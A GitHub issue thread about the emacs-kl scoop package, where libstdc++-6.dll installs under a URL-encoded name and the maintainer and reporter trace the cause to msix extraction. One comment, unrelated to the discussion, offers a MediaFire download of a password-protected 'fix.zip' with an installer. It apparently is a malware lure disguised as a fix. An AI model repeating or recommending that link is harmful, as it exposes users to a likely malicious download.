### ISSUE TITLE
emacs-kl: libstdc++-6.dll is missing

### ISSUE THREAD

**Issue by ShuguangSun** [kiennq/scoop-misc#15]
`libstdc++-6.dll` is missing, but there is a `libstdc%2B%2B-6.dll`

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kiennq** [comment]
Seems likely issue with 7zip. Can you file an issue on the [scoop repo](https://github.com/ScoopInstaller/Scoop)?
Here is the command used to extract the archive from msix `Get-ChildItem \"$dir\\*.msix\" | %{Expand-7zipArchive $_.FullName \"$dir\"}`

**Comment by ShuguangSun** [comment]
It is not about 7zip only. I open the msix file with zip (change the extension with zip), and the name of `libstdc++-6.dll` is not correct yet. So try to change it during installing.

**Comment by kiennq** [comment]
You're right, I left a comment there
